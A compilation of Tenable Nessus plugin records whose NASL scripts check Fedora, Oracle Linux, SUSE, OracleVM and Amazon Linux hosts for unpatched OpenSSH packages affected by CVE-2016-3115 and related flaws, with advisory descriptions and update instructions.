description: Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen: 2020-06-05
modified: 2016-05-09
plugin id: 90947
published: 2016-05-09
reporter: This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/90947
title: Fedora 24 : gsi-openssh-7.2p2-2.fc24 (2016-08e5803496)
code:

#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2016-08e5803496.
#

include("compat.inc");

if (description)
{
  script_id(90947);
  script_version("2.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");

  script_cve_id("CVE-2016-3115");
  script_xref(name:"FEDORA", value:"2016-08e5803496");

  script_name(english:"Fedora 24 : gsi-openssh-7.2p2-2.fc24 (2016-08e5803496)");
  script_summary(english:"Checks rpm output for the updated package.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Fedora host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Sync with openssh package.

Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.redhat.com/show_bug.cgi?id=1318201"
  );
  # https://lists.fedoraproject.org/pipermail/package-announce/2016-May/184264.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?57a55728"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected gsi-openssh package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:gsi-openssh");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:24");

  script_set_attribute(attribute:"patch_publication_date", value:"2016/05/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/09");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Fedora Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^24([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 24.x", "Fedora " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);

flag = 0;
if (rpm_check(release:"FC24", reference:"gsi-openssh-7.2p2-2.fc24")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "gsi-openssh");
}
NASL family: Oracle Linux Local Security Checks
NASL id: ORACLELINUX_ELSA-2016-0466.NASL
description: From Red Hat Security Advisory 2016:0466 : Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 90075
published: 2016-03-22
reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/90075
title: Oracle Linux 6 : openssh (ELSA-2016-0466)
code:

#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2016:0466 and
# Oracle Linux Security Advisory ELSA-2016-0466 respectively.
#

include("compat.inc");

if (description)
{
  script_id(90075);
  script_version("2.6");
  script_cvs_date("Date: 2019/09/27 13:00:37");

  script_cve_id("CVE-2015-5600", "CVE-2016-3115");
  script_xref(name:"RHSA", value:"2016:0466");

  script_name(english:"Oracle Linux 6 : openssh (ELSA-2016-0466)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Oracle Linux host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"From Red Hat Security Advisory 2016:0466 :

Updated openssh packages that fix two security issues are now
available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having Moderate
security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.

OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These
packages include the core files necessary for both the OpenSSH client
and server.

It was discovered that the OpenSSH server did not sanitize data
received in requests to enable X11 forwarding. An authenticated client
with restricted SSH access could possibly use this flaw to bypass
intended restrictions. (CVE-2016-3115)

It was discovered that the OpenSSH sshd daemon did not check the list
of keyboard-interactive authentication methods for duplicates. A
remote attacker could use this flaw to bypass the MaxAuthTries limit,
making it easier to perform password guessing attacks. (CVE-2015-5600)

All openssh users are advised to upgrade to these updated packages,
which contain backported patches to correct these issues. After
installing this update, the OpenSSH server daemon (sshd) will be
restarted automatically."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://oss.oracle.com/pipermail/el-errata/2016-March/005877.html"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected openssh packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-askpass");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-clients");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-ldap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-server");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:pam_ssh_agent_auth");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:6");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/08/02");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Oracle Linux Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux");
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux");
os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux");
os_ver = os_ver[1];
if (! preg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 6", "Oracle Linux " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu);

flag = 0;
if (rpm_check(release:"EL6", reference:"openssh-5.3p1-114.el6_7")) flag++;
if (rpm_check(release:"EL6", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++;
if (rpm_check(release:"EL6", reference:"openssh-clients-5.3p1-114.el6_7")) flag++;
if (rpm_check(release:"EL6", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++;
if (rpm_check(release:"EL6", reference:"openssh-server-5.3p1-114.el6_7")) flag++;
if (rpm_check(release:"EL6", reference:"pam_ssh_agent_auth-0.9.3-114.el6_7")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else
audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-ldap / etc"); }
NASL family: SuSE Local Security Checks
NASL id: SUSE_SU-2016-1528-1.NASL
description: openssh was updated to fix three security issues. These security issues were fixed :
- CVE-2016-3115: Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH allowed remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions (bsc#970632).
- CVE-2016-1908: Possible fallback from untrusted to trusted X11 forwarding (bsc#962313).
- CVE-2015-8325: Ignore PAM environment vars when UseLogin=yes (bsc#975865).
The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 91655
published: 2016-06-17
reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/91655
title: SUSE SLES11 Security Update : openssh (SUSE-SU-2016:1528-1)
code:

```nasl
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SUSE update advisory SUSE-SU-2016:1528-1.
# The text itself is copyright (C) SUSE.
#

include("compat.inc");

if (description)
{
  script_id(91655);
  script_version("2.11");
  script_cvs_date("Date: 2019/09/11 11:22:13");

  script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115");

  script_name(english:"SUSE SLES11 Security Update : openssh (SUSE-SU-2016:1528-1)");
  script_summary(english:"Checks rpm output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote SUSE host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"openssh was updated to fix three security issues.

These security issues were fixed :

  - CVE-2016-3115: Multiple CRLF injection vulnerabilities in
    session.c in sshd in OpenSSH allowed remote
    authenticated users to bypass intended shell-command
    restrictions via crafted X11 forwarding data, related to
    the (1) do_authenticated1 and (2) session_x11_req
    functions (bsc#970632).

  - CVE-2016-1908: Possible fallback from untrusted to
    trusted X11 forwarding (bsc#962313).

  - CVE-2015-8325: Ignore PAM environment vars when
    UseLogin=yes (bsc#975865).

The update package also includes non-security fixes. See advisory for
details.

Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable has
attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=729190"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=932483"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=948902"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=960414"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=961368"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=961494"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=962313"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=965576"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=970632"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=975865"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2015-8325/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-1908/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-3115/"
  );
  # https://www.suse.com/support/update/announcement/2016/suse-su-20161528-1/
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?81906f53"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"To install this SUSE Security Update use YaST online_update.
Alternatively you can run the command listed for your product :

SUSE Linux Enterprise Server 11-SP4 :

zypper in -t patch slessp4-openssh-12603=1

SUSE Linux Enterprise Debuginfo 11-SP4 :

zypper in -t patch dbgsp4-openssh-12603=1

To bring your system up-to-date, use 'zypper patch'."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-fips");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-helpers");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/06/08");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/17");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE");
os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE");
os_ver = os_ver[1];
if (! preg(pattern:"^(SLES11)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLES11", "SUSE " + os_ver);

if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu);

sp = get_kb_item("Host/SuSE/patchlevel");
if (isnull(sp)) sp = "0";
if (os_ver == "SLES11" && (! preg(pattern:"^(4)$", string:sp))) audit(AUDIT_OS_NOT, "SLES11 SP4", os_ver + " SP" + sp);

flag = 0;
if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-6.6p1-21.1")) flag++;
if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-askpass-gnome-6.6p1-21.3")) flag++;
if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-fips-6.6p1-21.1")) flag++;
if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-helpers-6.6p1-21.1")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh");
}
```
NASL family: OracleVM Local Security Checks
NASL id: ORACLEVM_OVMSA-2016-0048.NASL
description: The remote OracleVM system is missing necessary patches to address critical security updates :
- CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317817)
- Restore functionality of pam_ssh_agent_auth in FIPS mode (#1278315)
- Initialize devices_done variable for challenge response (#1281468)
- Update behaviour of X11 forwarding to match upstream (#1299048)
- Amends previous release, fixing typos and behaviour changes
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 91153
published: 2016-05-16
reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/91153
title: OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0048)
code:

```nasl
#
# (C) Tenable Network Security, Inc.
#
# The package checks in this plugin were extracted from OracleVM
# Security Advisory OVMSA-2016-0048.
#

include("compat.inc");

if (description)
{
  script_id(91153);
  script_version("2.7");
  script_cvs_date("Date: 2019/09/27 13:00:35");

  script_cve_id("CVE-2016-3115");

  script_name(english:"OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0048)");
  script_summary(english:"Checks the RPM output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote OracleVM host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The remote OracleVM system is missing necessary patches to address
critical security updates :

  - CVE-2016-3115: missing sanitisation of input for X11
    forwarding (#1317817)

  - Restore functionallity of pam_ssh_agent_auth in FIPS mode
    (#1278315)

  - Initialize devices_done variable for challenge response
    (#1281468)

  - Update behaviour of X11 forwarding to match upstream
    (#1299048)

  - Ammends previous release, fixing typos and behaviour
    changes"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://oss.oracle.com/pipermail/oraclevm-errata/2016-May/000462.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://oss.oracle.com/pipermail/oraclevm-errata/2016-May/000461.html"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"Update the affected openssh / openssh-clients / openssh-server packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssh-clients");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssh-server");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.3");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.4");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/05/13");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/16");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"OracleVM Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/OracleVM/release", "Host/OracleVM/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/OracleVM/release");
if (isnull(release) || "OVS" >!< release) audit(AUDIT_OS_NOT, "OracleVM");
if (! preg(pattern:"^OVS" + "(3\.3|3\.4)" + "(\.[0-9]|$)", string:release)) audit(AUDIT_OS_NOT, "OracleVM 3.3 / 3.4", "OracleVM " + release);
if (!get_kb_item("Host/OracleVM/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "OracleVM", cpu);
if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu);

flag = 0;
if (rpm_check(release:"OVS3.3", reference:"openssh-5.3p1-117.el6")) flag++;
if (rpm_check(release:"OVS3.3", reference:"openssh-clients-5.3p1-117.el6")) flag++;
if (rpm_check(release:"OVS3.3", reference:"openssh-server-5.3p1-117.el6")) flag++;
if (rpm_check(release:"OVS3.4", reference:"openssh-5.3p1-117.el6")) flag++;
if (rpm_check(release:"OVS3.4", reference:"openssh-clients-5.3p1-117.el6")) flag++;
if (rpm_check(release:"OVS3.4", reference:"openssh-server-5.3p1-117.el6")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-clients / openssh-server");
}
```
NASL family: Amazon Linux Local Security Checks
NASL id: ALA_ALAS-2016-668.NASL
description: It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 89965
published: 2016-03-17
reporter: This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/89965
title: Amazon Linux AMI : openssh (ALAS-2016-668)
code:

```nasl
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Amazon Linux AMI Security Advisory ALAS-2016-668.
#

include("compat.inc");

if (description)
{
  script_id(89965);
  script_version("2.5");
  script_cvs_date("Date: 2019/04/11 17:23:06");

  script_cve_id("CVE-2016-3115");
  script_xref(name:"ALAS", value:"2016-668");

  script_name(english:"Amazon Linux AMI : openssh (ALAS-2016-668)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Amazon Linux AMI host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"It was discovered that the OpenSSH server did not sanitize data received
in requests to enable X11 forwarding. An authenticated client with
restricted SSH access could possibly use this flaw to bypass intended
restrictions."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://alas.aws.amazon.com/ALAS-2016-668.html"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Run 'yum update openssh' to update your system."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-clients");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-keycat");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-ldap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-server");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:pam_ssh_agent_auth");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:amazon:linux");

  script_set_attribute(attribute:"patch_publication_date", value:"2016/03/16");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/17");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Amazon Linux Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/AmazonLinux/release", "Host/AmazonLinux/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/AmazonLinux/release");
if (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, "Amazon Linux");
os_ver = pregmatch(pattern: "^AL(A|\d)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Amazon Linux");
os_ver = os_ver[1];
if (os_ver != "A")
{
  if (os_ver == 'A') os_ver = 'AMI';
  audit(AUDIT_OS_NOT, "Amazon Linux AMI", "Amazon Linux " + os_ver);
}

if (!get_kb_item("Host/AmazonLinux/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

flag = 0;
if (rpm_check(release:"ALA", reference:"openssh-6.6.1p1-23.60.amzn1")) flag++;
if (rpm_check(release:"ALA", reference:"openssh-clients-6.6.1p1-23.60.amzn1")) flag++;
if (rpm_check(release:"ALA", reference:"openssh-debuginfo-6.6.1p1-23.60.amzn1")) flag++;
if (rpm_check(release:"ALA", reference:"openssh-keycat-6.6.1p1-23.60.amzn1")) flag++;
if (rpm_check(release:"ALA", reference:"openssh-ldap-6.6.1p1-23.60.amzn1")) flag++;
if (rpm_check(release:"ALA", reference:"openssh-server-6.6.1p1-23.60.amzn1")) flag++;
if (rpm_check(release:"ALA", reference:"pam_ssh_agent_auth-0.9.3-9.23.60.amzn1")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-clients / openssh-debuginfo / openssh-keycat / etc");
}
```
NASL family: Oracle Linux Local Security Checks
NASL id: ORACLELINUX_ELSA-2016-0465.NASL
